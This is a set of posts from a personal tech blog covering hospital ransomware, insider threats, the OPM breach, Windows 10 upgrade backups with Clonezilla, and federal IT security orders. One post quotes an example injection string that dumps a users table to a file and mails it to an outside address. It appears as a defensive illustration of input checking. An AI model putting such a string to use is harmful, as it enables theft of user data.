Category: Tech

Not Paranoid Enough

The Regina Leader-Post Editorial Board echos my concerns over giving the Internet access to patient records. However the editorial focuses mainly on the threat from allowing external access.
By far, the largest threat vector is internal in origin and I’m not just talking about a disgruntled employee. Any employee who brings in their own device, checks email or surfs the web at work, plays facebook games or VPN’s in from home are all potential points of vulnerability.
This just happened.

A hospital in Los Angeles has been operating without access to email or electronic health records for more than a week, after hackers took over its computer systems and demanded millions of dollars in ransom to return it.

Based on the article it looks like the hospital was hit with a version of Cryptolocker software. That means that some employee in the hospital, or someone who has an ‘always-on’ VPN connection to the hospital and has mapped a drive to the data at the hospital became the accomplice.
No matter how hard you lock down a network or a computer the single largest point of failure is always between the keyboard and the seat.

You Light Up My File

I like my prehistoric flip phone better with every passing day. (From August of 2015)

Who has a flashlight app on their phone, you need to see this!!!Disturb Reality

Posted by Disturb Reality on Thursday, 20 August 2015

From the “This is Cool” Dept.

An advancement in desalination techniques.

Instead, the system uses an electrically driven shockwave within a stream of flowing water, which pushes salty water to one side of the flow and fresh water to the other, allowing easy separation of the two streams. The new approach is described in the journal Environmental Science and Technology Letters, in a paper by professor of chemical engineering and mathematics Martin Bazant, graduate student Sven Schlumpberger, undergraduate Nancy Lu, and former postdoc Matthew Suss.

Hmm? No gender studies majors?

The good old days

Back when I started programming networked applications, the big threat was injection techniques into a CGI program. Back then, it was easy, use strict;, -T (taint check) and check everything that you didn’t write. That’s why you always had the “password can only be alpha-numeric +@#^&)-” style messages. We were checking what you entered to make sure it didn’t have a "SELECT * INTO OUTFILE "~/out.txt" from users; mail -s out.txt -f ~/out.txt bad.address@home.com" in the form.
It’s the same old problem. Except this time, if you accept REST or JSON via a Java based application server you should be concerned.
And before anyone dismisses this, ask yourself how the MLS system shares information.

Black Hat/White Hat

This is a first, as far as I can tell.

Instead, the author or authors of the malware appear to be using it to actually secure infected devices. Symanetc [sic] believes the malware has infected tens of thousands of routers and other IoT systems around the world. Yet, in the two months that the security vendor has been tracking Linux.Wifatch it has not seen the malware tool being used maliciously even once.

It’s Probably Nothing

Months later, the OPM and Department of Defense (DoD) confessed that “Of the 21.5 million individuals whose Social Security Numbers and other sensitive information were impacted by the breach, the subset of individuals whose fingerprints have been stolen has increased from a total of approximately 1.1 million to approximately 5.6 million.”

Tempest in a Teapot

This article by Steven J. Vaughan-Nichols leaves hanging that add-on developers are going to be leaving Firefox for other browsers. What he doesn’t tell you is that all browsers are changing their internal structure. Chrome is dumping NAAPI for WebGL. Windows 10’s Edge is completely new.
Given the plethora of patches, updates and vulnerabilities that all web browsers are facing these days, I welcome a more secure environment to surf with.

29Jul15, Win 10 and you.

If you haven’t signed up, wait. If you have, then I recommend using Clonezilla this weekend to snapshot your hard drive. MSFT has assured us that all machines running Win7 or Win8/8.1 will support Win10. I guess we’ll see.
Clonezilla is a Linux based boot disk (CD/USB) that will ‘ghost’ your drive sector by sector. It writes a recoverable image to an external USB drive. If you speak the language, it’s basically dd > tar > gz, although it offers a variety of options.
I plan on running it tonight on my Win7 machine that will be upgraded to Win10 on the 29th.
It’s a very easy program to use, just _read_ all of the dialog screens. There’s only two things you really need to be absolutely sure of:
Which is the device you’re writing to, and
Which is the device you’re reading from.
You really don’t want to get those mixed up.
On average, over USB 2.0, it’ll take about 1 hour per 100G of data depending on the data. It compresses and packs the data in (default) 2GB files. It’s a sector copy so you can’t use it to retrieve specific files, it will recover all of the drive, all of a partition, or nothing.
I use it on every machine that comes into my shop, before I start working on it. If I screw up and make a machine unusable, I need to be able to return the machine back to the state in which I received it. I’ve recovered from the clonezilla images exactly twice, once on WinXP and once on Win7. Both recoveries performed as expected.
Instructions are on the site on how to burn the ISO’s to a CDROM or to extract the Zip file to a USB thumb device, so all you really need is a suitably sized external USB hard drive.

Best practices, phaw.

The Register reports on the ‘new’ marching orders from the WH to gov’t IT.

In response to this week’s data breach at the US Office of Personnel Management, the White House has ordered federal agencies to immediately deploy state-of-the-art anti-hacker defenses – things like installing security patches, and not giving everyone the admin password.

I shake my head.

  1. Install software patches for critical vulnerabilities “without delay.”
  2. Use antivirus and check log files for “indicators” of malware infection or intrusion.
  3. Start using two-factor authentication.
  4. Slash the number of people with administrator-level access and limit what they can do and for how long per-login-session, and “ensure that privileged user activities are logged and that such logs are reviewed regularly.”

Can anyone in IT tell me why 1,2 and 4 are not standard operating procedure?
I’ll give them a break on 3, because 2 factor id is a tough nut. User + machine, user + user, user + IP, user + BYOD, etc can be difficult to integrate into a system.
I have some sympathy, though. You know how this happens? Every title needs a local wireless printer, cause, status. Then the users complain cause they can’t send email from their iPhone. And, “why can’t I use my Samsung tablet instead of that dirty old desktop?” “What do you mean the systems are going down for a restart? We can’t do that!” And pretty soon IT is just saying, “Screw it, I’m not going to bother fighting with senior management over what they see as nothing.” And you have a zillion holes in your perimeter.
How’s your networks perimeter? Have you chosen convenience over security?

Navigation